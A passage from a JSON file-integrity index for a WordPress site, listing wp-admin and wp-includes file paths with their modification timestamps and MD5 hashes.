1b600b6b8df9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/media.min.js\":{\"d\":1539135686,\"h\":\"9be63adbaf5a5acfdbfdd555dc19777d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/tags.min.js\":{\"d\":1539135686,\"h\":\"29e8d4a7d3c7c16432b99a053c7a5df5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/set-post-thumbnail.min.js\":{\"d\":1539135686,\"h\":\"8bc5ca12fa38a607d5af2181311b7a5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/user-profile.min.js\":{\"d\":1539135686,\"h\":\"ec11a68b00ee850bd0b91ae99d11c0b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/language-chooser.min.js\":{\"d\":1539135686,\"h\":\"1d6822384a71090c74add106e4468581\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/language-chooser.js\":{\"d\":1407176236,\"h\":\"09e20150c7561d0330d7158f744abb4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/set-post-thumbnail.js\":{\"d\":1433123066,\"h\":\"2b5153576d1eee4002fb7ed9e5831251\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/js\\/iris.min.js\":{\"d\":1477425810,\"h\":\"45076064fdcbfcf9f5c8996e10ac4bc9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/privacy.php\":{\"d\":1532022386,\"h\":\"f609c7809829682e79246bbc48307073\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/load-scripts.php\":{\"d\":1541660092,\"h\":\"4c485995619f039aaf74f800d6ffd75e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/edit-comments.php\":{\"d\":1520545542,\"h\":\"75707eecac333da5ddbd0164b0380b2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/profile.php\":{\"d\":1380059292,\"h\":\"9184e53f96bade3e7ae7cda9eddf7a26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/link.php\":{\"d\":1468102890,\"h\":\"6e4173fd43a2a01b3509c80ee984d22b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/ms-edit.php\":{\"d\":1380059292,\"h\":\"16d42ff617c4a616c3bd94ba103a4582\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/media-upload.php\":{\"d\":1520545542,\"h\":\"f212cdb469e783cfefcb142207f83e02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/ms-delete-site.php\":{\"d\":1508365130,\"h\":\"e7dfdd601dcc0fcaa1f3ebd7f354fa4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/edit-form-advanced.php\":{\"d\":1540792764,\"h\":\"8e008e7834b0b8be958e2a520d2b4c6f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/edit-form-blocks.php\":{\"d\":1547081533,\"h\":\"5b164b0021ae9990d10f7e44effb60be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/widgets.php\":{\"d\":1520545542,\"h\":\"ab5b28a7351c3cc9ca61e751b8ad6aa2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/options-head.php\":{\"d\":1463155892,\"h\":\"9a616e7dd468d1c2499b90600e710da5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/credits.php\":{\"d\":1542891286,\"h\":\"78da499b2f81191314a92ebf5e337ed1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/load-styles.php\":{\"d\":1539219202,\"h\":\"290517fd5218e5bb30c3ef039fd2e559\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/edit-tags.php\":{\"d\":1520545542,\"h\":\"394ad4677446d018b68ac6d25b11e0cc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/admin-header.php\":{\"d\":1540169080,\"h\":\"0115919dbbea2e16011560d8cee4b062\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/link-manager.php\":{\"d\":1481132926,\"h\":\"3f5df1a9b8e6ec896cb925892c89b6f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/custom-background.php\":{\"d\":1501107044,\"h\":\"48aae41a97e99cbafb28ece38f489841\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/admin.php\":{\"d\":1508877048,\"h\":\"0402ac65e6e367dddea2d155d869ed7b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/custom-header.php\":{\"d\":1520545542,\"h\":\"a6d4a935988677ac9cd667030d7f55bf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/theme-install.php\":{\"d\":1516035640,\"h\":\"ac9c42ef02c74a99e8109270107b41ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/term.php\":{\"d\":1520545542,\"h\":\"5b2c683b5996e6c34944cace806054fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/admin-post.php\":{\"d\":1456395808,\"h\":\"163ecc5b73b40ce02ba418a3edee2c68\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/ms-themes.php\":{\"d\":1380059292,\"h\":\"521cb94b9501ca24bc495a31c66925d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/options.php\":{\"d\":1532443106,\"h\":\"559806ccbc1497b4ad7d6e5a3c440abc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/install-helper.php\":{\"d\":1444857266,\"h\":\"6456b260aa9dece9b30431260cdb1a6c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/options-general.php\":{\"d\":1516825778,\"h\":\"62b492d696733adec8e542d18383ab03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/plugin-install.php\":{\"d\":1503393768,\"h\":\"513e9628f732070ab1926855e81afbc1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/revision.php\":{\"d\":1479682352,\"h\":\"7c7275a9483338d119c46811dcb31e17\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/plugins.php\":{\"d\":1540283680,\"h\":\"7cd219c9bc88f4b652546a4d0a3dac1d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/error_log\":{\"d\":1546411401,\"h\":\"5b71f53ae1f8f11019808d7d49b80e84\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/comment.php\":{\"d\":1475555070,\"h\":\"d78ff82d6fe2cca6b06cf36d78a581dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/update-core.php\":{\"d\":1507151626,\"h\":\"dc115398ae4261756edc127cc5877ac1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/link-parse-opml.php\":{\"d\":1477275332,\"h\":\"58436a5af6f318352bf596ab8a3f4962\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/media-new.php\":{\"d\":1475603854,\"h\":\"836f9208c65682aab7681909d9a80abd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/install.php\":{\"d\":1504544444,\"h\":\"de9004a6a062af6f1d29393eb54cad9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/options-reading.php\":{\"d\":1505051444,\"h\":\"c4bb064ca522f9306e32abe13d107dd8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/post.php\":{\"d\":1547081533,\"h\":\"113f984e8ea915a7e082c82c24270aea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/edit-link-form.php\":{\"d\":1540792764,\"h\":\"83cda35a941f840922feb1c541addb00\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/link-add.php\":{\"d\":1467204390,\"h\":\"a0ee0eaab7c6f32171b0215409caa2fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/nav-menus.php\":{\"d\":1543600546,\"h\":\"a0f93825dbf4d8b679de6ae78f82f3d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/admin-functions.php\":{\"d\":1467799830,\"h\":\"af0b46eafb24e3733a8839836d256146\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network.php\":{\"d\":1503393768,\"h\":\"5e60a86ac7b805511faacf32831a5e02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/upload.php\":{\"d\":1490972924,\"h\":\"07fd427d371d52fb67c1c0868a17ebf1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/options-media.php\":{\"d\":1521577180,\"h\":\"db735198ba1b69a26160e302b75579e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/index.php\":{\"d\":1540283680,\"h\":\"ee73cbb1a8ea660cc67de9856ab10361\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/menu-header.php\":{\"d\":1504959644,\"h\":\"e088b7d5057d1258e388c13b323b4059\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/upgrade.php\":{\"d\":1449602788,\"h\":\"b2efdd003aeacd49ea8325fc923000c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/options-discussion.php\":{\"d\":1532443106,\"h\":\"e9d36dbad896e5c898aab58a5eb3c05f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/upgrade-functions.php\":{\"d\":1467799830,\"h\":\"68070de41736e57f8757648a80b9cbbb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/users.php\":{\"d\":1520545542,\"h\":\"e8734fcc98ec47942419f051c519ba69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/edit.php\":{\"d\":1542953146,\"h\":\"2676aa02f12ccf2d9580b37c1034c7fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/tools.php\":{\"d\":1525890628,\"h\":\"ae41f25fd7e20e76692dc667a2829c08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/admin-footer.php\":{\"d\":1483963722,\"h\":\"d654eec8adacac1410b17fd67b81da10\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/export.php\":{\"d\":1475603854,\"h\":\"9fefc2dfafaccf4644da004bc5db0cfe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/plugin-editor.php\":{\"d\":1508861868,\"h\":\"75dabd226fdd5ee46bc106b1d16e6326\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/ms-sites.php\":{\"d\":1380059292,\"h\":\"5d186224ebf4ddd0f1719c9ef4b80468\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/update.php\":{\"d\":1507556088,\"h\":\"53e411ff8a140c82ee686e29c1d6da4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/press-this.php\":{\"d\":1520545542,\"h\":\"edab57a3f6878f62b7f503e5caaf8d36\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/options-writing.php\":{\"d\":1508833312,\"h\":\"0ae22f1812922e0ba1765b2503277e14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/my-sites.php\":{\"d\":1507553566,\"h\":\"310c43340709c3ef43daadbc8cfe6827\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/freedoms.php\":{\"d\":1542900826,\"h\":\"f9e188268a0e98d03737c60b2a145e69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/themes.php\":{\"d\":1520545542,\"h\":\"984a921f9e121b276b6da2cff8c5ec74\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/ms-users.php\":{\"d\":1380059292,\"h\":\"4823c8667b23ca83b31bf9093647e5a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/theme-editor.php\":{\"d\":1511745820,\"h\":\"dc255b34563a17256821b63d251977c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/ms-upgrade-network.php\":{\"d\":1380059292,\"h\":\"7cb492260f22ee53816d96be3868be6d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/ms-options.php\":{\"d\":1380059292,\"h\":\"a21d278e00ca7dccfe3a81d4e386afa9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/setup-config.php\":{\"d\":1508331474,\"h\":\"1d0a18e89294982f9edf490abb613a13\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/edit-form-comment.php\":{\"d\":1540792764,\"h\":\"efab9df3f5bcf60f79f0c3d31c08e735\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/async-upload.php\":{\"d\":1506002748,\"h\":\"8c1a8754cbe03dc6ab8ddcfaa1be4a7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/about.php\":{\"d\":1547081533,\"h\":\"a8e8e05e3edb00d74ad51a75898b6c16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/moderation.php\":{\"d\":1380059292,\"h\":\"541242a293805952a0e22234f09d6fa9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/ms-admin.php\":{\"d\":1380059292,\"h\":\"9a05b49740dfcdaf4516851b623606e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/edit-tag-form.php\":{\"d\":1506514186,\"h\":\"a3373f8e5e714820ff6d29ceb0cc5c59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/admin-ajax.php\":{\"d\":1540283680,\"h\":\"d69028152b87ab999b4cef2300826d83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/options-permalink.php\":{\"d\":1508920906,\"h\":\"2009af862d73c1e66db06bdc1d907b4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/media.php\":{\"d\":1481144440,\"h\":\"88e7c8705372b89c29cd6ed64b3a0a45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/post-new.php\":{\"d\":1540354600,\"h\":\"d60e62eebc5ac703c2a7644643a275a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/menu.php\":{\"d\":1525973906,\"h\":\"ce7f2afd5add0e60c565f3ca0bc7c948\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user-edit.php\":{\"d\":1505846688,\"h\":\"db9da4de8805b2f532834a33f2fba054\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user-new.php\":{\"d\":1520545542,\"h\":\"d8c79a7028b526ec7a4f0b9ff15b3c7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/customize.php\":{\"d\":1520545542,\"h\":\"c009ae2bd67727cd715dc071e228ac32\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/import.php\":{\"d\":1475603854,\"h\":\"f3ee1ef15a9a620217059a853d728d7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Transport\\/fsockopen.php\":{\"d\":1475628878,\"h\":\"1d21ee4a4f60ad1afc48f118483fb73f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Transport\\/cURL.php\":{\"d\":1475628878,\"h\":\"0ee4801d08da383712136160435ae0d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/Transport\\/cURL.php\":{\"d\":1463105548,\"h\":\"853654cd672a1a9b3a09af077837dfe1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/413.php\":{\"d\":1463105548,\"h\":\"e9963cc15dc99059b7d9ff584c17bfd8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/504.php\":{\"d\":1463105548,\"h\":\"02d76d8cccaa446293201112908a2aa5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/500.php\":{\"d\":1463105548,\"h\":\"c0afa9c66b6d830a094815f2124dffda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/410.php\":{\"d\":1463105548,\"h\":\"71be4f3437dfbadda52f38582184e19b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/414.php\":{\"d\":1463105548,\"h\":\"bca65d55e2409ef6a5291ed8e6a12368\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/412.php\":{\"d\":1463105548,\"h\":\"25b88449dcb7a1a83dd906378aa556c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/Unknown.php\":{\"d\":1463105548,\"h\":\"da646c02e1ab81b632af41fbcf0a57ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/407.php\":{\"d\":1463105548,\"h\":\"c2c817e9f5d8768bbde4d66a26e6c6b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/409.php\":{\"d\":1463105548,\"h\":\"995a1dc469e67e2a3d0b8f9bebfea9b6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/505.php\":{\"d\":1463105548,\"h\":\"8e5d4109053303e65b2f4364c1ac12de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/511.php\":{\"d\":1465525234,\"h\":\"03756e9a4e3c4b77f8d09bb9918fd140\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/416.php\":{\"d\":1463105548,\"h\":\"f931824e39e39617c9aac661804478f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/306.php\":{\"d\":1463105548,\"h\":\"57737a071fa1754e50db6adcc9f25875\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/305.php\":{\"d\":1463105548,\"h\":\"58f8f700904bebe62f60a11c2cfbab26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/406.php\":{\"d\":1463105548,\"h\":\"4bc8cb6cef688c729edc3990220006ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/408.php\":{\"d\":1463105548,\"h\":\"403e3164844958c5144f98ecc8b77689\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/415.php\":{\"d\":1463105548,\"h\":\"0258cc0fb05462ea8f11ccaea34a55c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/418.php\":{\"d\":1465525234,\"h\":\"4a21bae298f1c9feda5b0e93fe348af3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/501.php\":{\"d\":1463105548,\"h\":\"650cdab83034f22d3fe803f5d791a835\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/417.php\":{\"d\":1463105548,\"h\":\"4270026a1b8e684f5ec0635c47201c23\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/502.php\":{\"d\":1463105548,\"h\":\"7cc83a6c80cf7af9d5217b17fb47ff69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/404.php\":{\"d\":1463105548,\"h\":\"1ed416cc6311835900857973f8923c4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/400.php\":{\"d\":1463105548,\"h\":\"51e56e878cbb564ab852c978fb35fcd0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/402.php\":{\"d\":1463105548,\"h\":\"60f859d55150da0b0a7a959ac9f347d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/403.php\":{\"d\":1463105548,\"h\":\"bcd160e8f70dc76ffbbf6b33b7fe31df\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/411.php\":{\"d\":1463105548,\"h\":\"27a552a1e4160c4df61b2eca5a604796\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/429.php\":{\"d\":1465525234,\"h\":\"53f0dd257c04462ec3a05a6485b38fcc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/431.php\":{\"d\":1465525234,\"h\":\"e0e3737c622417ca08d5d1933c1489d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/401.php\":{\"d\":1463105548,\"h\":\"3b2ab80eb9cbfd87baa23fc1648e9940\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/503.php\":{\"d\":1463105548,\"h\":\"3906f7520861c39f43f46000d45554b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/405.php\":{\"d\":1463105548,\"h\":\"dd38d182de6d21b2d2ac18b381adf97f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/304.php\":{\"d\":1463105548,\"h\":\"d33b4634ce4113db49ef9dddedf754ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/428.php\":{\"d\":1465525234,\"h\":\"9a97bb0369f70142e4e57da75eae742a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/HTTP.php\":{\"d\":1463105548,\"h\":\"e8d5fc68b3c6fa15e4526c161172dae5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception\\/Transport.php\":{\"d\":1463105548,\"h\":\"abbb6cf8da7ae8ea204a0118ab5ed101\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Utility\\/CaseInsensitiveDictionary.php\":{\"d\":1463105548,\"h\":\"b5f03ac8c752b34b9e726f04d548327a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Utility\\/FilteredIterator.php\":{\"d\":1463105548,\"h\":\"10f9a2d9618ed678b72541aa9e0579d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Response\\/Headers.php\":{\"d\":1463105548,\"h\":\"1ad7c382d2b68f19412da7f43e63a960\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Proxy\\/HTTP.php\":{\"d\":1463105548,\"h\":\"ffd0e62f32db05bdbda6bca407d7f029\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Auth\\/Basic.php\":{\"d\":1463105548,\"h\":\"67fdd878cc84df15093455d6096b2143\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Cookie\\/Jar.php\":{\"d\":1463105548,\"h\":\"e9300c5fb1f52670a0b52234d95c9510\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/IDNAEncoder.php\":{\"d\":1465525234,\"h\":\"d77dada232f0079b1412e0d050b4d8b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/SSL.php\":{\"d\":1465525234,\"h\":\"265067eb274136ac28be300b37540c4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Hooks.php\":{\"d\":1463105548,\"h\":\"2c15a0a520b9a8976778a169ceebd919\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/IRI.php\":{\"d\":1475628878,\"h\":\"183508325d839c7bf27db5f909600e58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Response.php\":{\"d\":1463105548,\"h\":\"11ce7086bbb7ae52e6abb7c4fd270b47\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Transport.php\":{\"d\":1463105548,\"h\":\"019c993bce6bed178baf4b5c566cc617\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Auth.php\":{\"d\":1463105548,\"h\":\"3197d2529dd957b2acc3944f5bfcd64a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Session.php\":{\"d\":1465525234,\"h\":\"37f8cadd86fcbfce9602b5bcf67d6c8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Exception.php\":{\"d\":1463105548,\"h\":\"879bac9efa180085ab33e90e1acc5249\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Proxy.php\":{\"d\":1463105548,\"h\":\"b5406b1037b500d7d374b85c2a879947\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Cookie.php\":{\"d\":1463105548,\"h\":\"d19d43afe99bc52881322b927960a4d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/IPv6.php\":{\"d\":1463105548,\"h\":\"a5df4b884e8a07e81703f1ac6b6e54b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Requests\\/Hooker.php\":{\"d\":1463105548,\"h\":\"0f08c5401425a9615bd19e2f34a5e107\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme-compat\\/comments.php\":{\"d\":1467799830,\"h\":\"1822ba9f62e4bf3d510a7e4306e67d4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme-compat\\/embed-content.php\":{\"d\":1508330388,\"h\":\"5fbd21787d7ebb346c00079ea298f073\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme-compat\\/header-embed.php\":{\"d\":1464183328,\"h\":\"67962ba2c878829d26817766d258dcc0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme-compat\\/footer-embed.php\":{\"d\":1464183328,\"h\":\"16841cf55adc04ab84f22e932b96196a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme-compat\\/embed-404.php\":{\"d\":1459180468,\"h\":\"8fab25000fafee699fb4e76871ed02f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme-compat\\/sidebar.php\":{\"d\":1467799830,\"h\":\"8087f37304ad86ff1748b4446c9a2c0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme-compat\\/header.php\":{\"d\":1467799830,\"h\":\"304c40bba1dd25870a0bceffefc25024\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme-compat\\/footer.php\":{\"d\":1467